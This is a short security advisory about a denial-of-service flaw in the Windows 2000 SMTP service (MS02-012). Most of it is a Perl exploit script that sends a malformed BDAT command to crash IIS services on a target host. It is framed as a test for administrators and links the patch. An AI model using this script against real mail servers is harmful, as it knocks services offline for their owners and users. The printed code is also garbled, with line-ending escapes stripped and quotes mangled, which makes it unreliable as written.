‘Windows SMTP Service Denial of Service (BDAT)’

Summary

‘As we reported in our previous article: Malformed Data Transfer Request Causes Windows SMTP Service to Fail, it is possible to cause Microsoft’s SMTP server to crash by sending it a malformed BDAT request. The following is an exploit code that can be used by administrators to test their server for the vulnerability.’

Credit:

‘The information has been provided by H D MooreA.’


Details

Exploit:
#!/usr/bin/perl -w
##################
#
#
# URL: http://www.digitaloffense.net/
# EMAIL: hdm@digitaloffense.net
# USAGE: ./mssmtp_dos.pl <target ip>
#
# Summary:
#
# The Microsoft Windows 2000 Internet Mail Service is vulnerable to a
# Denial of Service attack through the BDAT command. If exploited, this
# vulnerability will cause any and all services running under IIS (the
# inetinfo.exe process) to become unavailable.
#
#
# Solution:
#
# http://www.microsoft.com/technet/security/bulletin/MS02-012.asp
#

use IO::Socket;
    
$target = shift() || ‘127.0.0.1’;
my $port = 25;
my $rcpt = ‘Administrator’;
my $from = ‘crash@burn.com’;

my $sock = IO::Socket::INET->new (
                                    PeerAddr => $target,
                                    PeerPort => $port,
                                    Proto => ‘tcp’
                                 ) || die ‘could not connect: $!’;

my $banner = <$sock>;
if ($banner !~ /^2.*/)
{
    print STDERR ‘Error: invalid server response ‘$banner’.n’;
    exit(1);
}

print $sock ‘HELO $targetrn’;
$resp = <$sock>;

print $sock ‘MAIL FROM: $fromrn’;
$resp = <$sock>;

print $sock ‘RCPT TO: $rcptrn’;
$resp = <$sock>;

print $sock ‘BDAT 4rn’;
print $sock ‘b00mAUTH LOGINrn’;
$resp = <$sock>;

print $sock ‘rn’;
print $sock ‘rnrnrnrnrnrn’;

close($sock);’

Categories: Exploits